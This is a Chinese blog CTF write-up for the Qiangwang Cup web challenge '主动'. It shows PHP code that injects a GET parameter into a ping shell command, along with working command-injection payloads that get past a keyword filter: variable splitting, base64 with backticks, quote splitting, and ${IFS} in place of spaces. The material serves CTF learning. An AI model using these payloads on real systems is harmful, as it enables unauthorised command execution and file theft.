[第四届-强网杯]:主动

最新推荐文章于 2024-05-07 18:57:42 发布
最新推荐文章于 2024-05-07 18:57:42 发布
阅读量4.3k 收藏 1
点赞数 4
分类专栏: CTF_Writeup_[web]
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/108172711
版权

源码:

<?php
highlight_file("index.php");

if(preg_match("/flag/i", $_GET["ip"]))
{
    die("no flag");
}

system("ping -c 3 $_GET[ip]");

?>

很明显的命令执行:
在这里插入图片描述

由上,我们看到,flag.php就在当前目录下,那么直接cat ./flag不就行了?
可人家将flag关键字过滤了,绕过的方法非常简单(其实刚好前不久才碰到…),有很多种方法绕过;
思路也很简单,只要不然他匹配到关键字即可。

绕过

1.利用变量去绕过:

通过变量赋值,再进行拼接,即可进行绕过:
payload:

?ip=1;a=fl;b=ag;cat $a$b.php

查看源代码:
在这里插入图片描述

2.通过base64编码

我们需要执行的命令传进去base64编码下,在解码执行即可

?id=1;cat `echo 'Li9mbGFnLnBocAo=' | base64 -d`

这里说一下:反引号`在Linux的命令行中起着命令替换的作用。命令替换是指shell能够将一个命令的标准输出插在一个命令行中任何位置,即完成引用命令的执行,将其结果替换出来。也就是说会将`里面base64解码的命令输出结果返回到命令中。这样即可绕过限制。(说一下,这里不止反引号`,$()也能在shell中起到命令替换的效果。)
也就间接执行了cat ./flag.php
在这里插入图片描述

查看源代码:
在这里插入图片描述

3通过引号绕过关键字

主要的目的还是不让匹配到关键字,那好办
payload:

?id=1;cat ./fl'ag'.php

查看源代码:
在这里插入图片描述

4.绕空格过滤

如果碰到过滤空格,还可以\${IFS}、<、 $IFS、\$IFS$9等字符来代替。

当然绕过姿势肯定是不止上面所说的那些,要懂得随机应变。

flag:

flag:flag{I_like_qwb_web
keepb1ue
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第四届强网杯部分wp
weixin_44110537的博客
08-24 295
babycrt 通过分析sign函数中的代码,可以得到以下的等式:(记sign输出的值为ans) ans=S(c1*c2)%pq m+1-c1=Se1%t1…1 m+1-c2=Se2%t2…2 e1d=1%t1-1…5 e2d=1%t2-1…6 ed=1%(p-1)(q-1) Sq=md%qt2 Sp=(m+k)d%pt1 n=pq 通过观察S的生成方法可以知道S是余数为(Sq,Sp) 模数为 (qt2,pt1)的一个共同解(CRT),于是有: md=S%qt2 (m+k)d=S%pt1 即: md=S%q
【天格】战队-已解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中展现出卓越的技能和深入的理解,这是一场集技术、策略与团队协作于一体的顶级赛事。挑战赛中的解题附件揭示了网络安全领域的多个关键知识点,涵盖了逆向工程、...
强网杯-主动
Lnsomniaflight的博客
08-31 227
打开环境 看到ping -c 3,属于命令注入 尝试传递ip=127.0.0.1;ls 得到 显然if里面的内容过滤掉了flag,而我们需要读取flag.php内的内容 使用通配符 Base64编码绕过 ?id=1;cat echo 'Li9mbGFnLnBocAo=' | base64 -d: 用cat读取flag f12查看 ...
第四届强网杯主动
../../../../../../../
08-24 1382
注意⚠️此题是“命令执行绕过”,不是“代码执行绕过” 下发题目打开,拿到源码 <?php highlight_file("index.php"); if(preg_match("/flag/i", $_GET["ip"])) { die("no flag"); } system("ping -c 3 $_GET[ip]"); ?> 传入的参数如果匹配到了flag字符就输出“no flag” 测试一下,发现flag.php就在当前目录 如果要输出flag.php的内容,我们要
[ CTF ]【天格】战队WriteUp-第七届“强网杯”全国安全挑战赛
最新发布
heike_Ch的博客
05-07 683
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
[第四届-强网杯]:upload
Keepb1ue的博客
08-24 4304
下载附件,是一个解压后是一个数据包,wireshark打开分析,很明显,这是一个文件上传的数据包,分析数据包内容: 很明显,是一个文件上传的数据包。 接着看看他到底上传了什么数据: 很明显,是上传了一张steghide.jpg的图片 那我们可以尝试着在数据包中将图片还原出来在上传图片的数据包中。 指定上传流量的会话,显示和保存的数据改为原始数据,然后将其保存为:steghide.jpg 接着利用WinHex从保存的原始文件中将上传的图片还原出来。 将之前保存的steghide.bin用WinHex打
强网杯2022——WEB
weixin_43610673的博客
08-02 1648
www.zip下载源码,可见黑名单过滤。开启了spl_autoload_register没有做限制的话,在反序列化实例化一个test类的时候,spl_autoload_register会自动去当前目录下包含文件名为test.php或者是test.inc上传一个inc,再生成反序列化数据,最后去config.inc.php包含,执行木马。...
【天格】战队-未解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中分享了多个未解出的题目附件,这些附件涵盖了网络安全领域的多个子领域,包括逆向工程、漏洞利用(PWN)、密码学(Crypto)以及杂项(Misc)。通过分析这些文件...
强网杯:简单的UAF,fastbin attack打全局list,然后任意地址读写.zip
12-18
【标题】:“强网杯:简单的UAF,fastbin attack打全局list,然后任意地址读写.zip”揭示了网络安全竞赛中的一个常见技术挑战,主要涉及的是C/C++程序中的内存管理漏洞利用,特别是未初始化的指针引用(Use-After-...
2018强网杯CTF-题目整理-校本图片Readme.zip
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
第一届广东省强网杯CTF解密200.rar
09-30
"第一届广东省强网杯CTF解密200.rar" 这个标题揭示了几个关键信息。首先,这是关于一个网络安全竞赛的资料,具体来说是"广东省强网杯"的首届赛事。CTF,全称Capture The Flag,是一种流行的网络安全竞赛形式,参赛者...
强网杯2018 部分web wp
Sp4rkW的博客
03-26 6524
咸鱼web手被大佬虐哭,做又做不来,只能跟着队友躺躺这样子,QWQ 题目质量很高,膜一波FlappyPig的大佬们~ 0x00 web签到 第一层: 特殊子串举例如下: 240610708、QNKCDZO、aabg7XSs、aabC9RqS 直接过 第二层: 传入param[] 数组型,error = error,过 第三层,传入MD5相等文件,附脚本如下: ...
2022强网杯web(部分)
羽的博客
08-01 4262
2022强网杯web
强网杯web部分wp
freerats的博客
08-26 518
主动 ?ip=127.0.0.1|cat ls 使用内联执行 Funhash hash1=0e001233333333333334557778889可绕过 数组绕过 ffifdyop构成万能密钥 ?hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=2&hash4=ffifdyop flag{y0u_w1ll_l1ke_h4sh} web辅助 看到这个熟悉的替换,可以进行序列化字符逃逸 class.php里面的几个函
2021强网杯Write-Up真题解析之WEB部分(暴力干货,建议收藏)
MachineGunJoe666
06-16 4577
前言: 强网杯作为国内最好的CTF比赛之一,搞安全的博友和初学者都可以去尝试下。首先,里面有很多大神队伍,0x300R、eee、0ops、AAA、NeSE、Nu1L等,真的值得我们去学习。其次,非常感谢强网杯的主办方,这么好的比赛离不开许多师傅们的辛苦,我们应该感恩这么高质量比赛的幕后工作者。最后,作为一枚安全菜鸡,就让我简单复现下本次比赛的Web题目。不喜勿喷,欢迎指正~ 比赛信息 比赛全称:第五届强网杯全国网络安全挑战赛 比赛地址:https://ctf.ichunqiu.com/20.
2019强网杯Web部分Writeup
systemino的博客
06-16 650
题记 2019年的强网杯web题目出的都不错,所以对题目进行分析一下。 正文 upload 首先打开界面如下: 有注册和登陆功能! 首先我们注册一个账户,然后登陆,发现可以上传图片:PHP大马 这里首先想到的就是上传木马,但是经过尝试只能上传图片马,并且不能直接利用,经过抓包发现cookie是序列化内容,所以应该是通过cookie传递序列化内容,经过服务器的反序列化,然后...
实战:2019 强网杯 final Web Writeup
systemino的博客
06-17 976
前言 强网杯线下赛打的非常happy也非常累,感觉这种赛制非常有意思,早就厌倦了web的AD,这种cms的0/1day的挖掘非常带劲,就是和0ctf连着打,感觉命都没了。 线下赛共有3道web,分别是1道框架0/1day,2道cms前台getshell的0/1day,但是Laravel框架由于可以搜到相关CVE,于是本篇文章不再编写,只分析另外2个cms。 yxtcmf 信息搜集 拿到这...
2020强网杯线上赛web Funhash writeup
热门推荐
Love&Share
10-15 1万+
<?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { die('level 1 failed'); } //level 2 if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3'])) { die('
<?php highlight_file('index.php'); include("flag.php"); $id=$_POST['id']; $json=json_decode($_GET['j...
weixin_35750953的博客
02-16 331
这是一段 PHP 代码。这段代码会显示文件 "index.php" 的内容,并包含文件 "flag.php"。它还会将 POST 请求中的 "id" 参数赋值给变量 $id,并将 GET 请求中的 "json" 参数解码为数组并赋值给变量 $json。如果 $id 等于 "wllmNB",则会执行下一个 if 语句。 ...
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值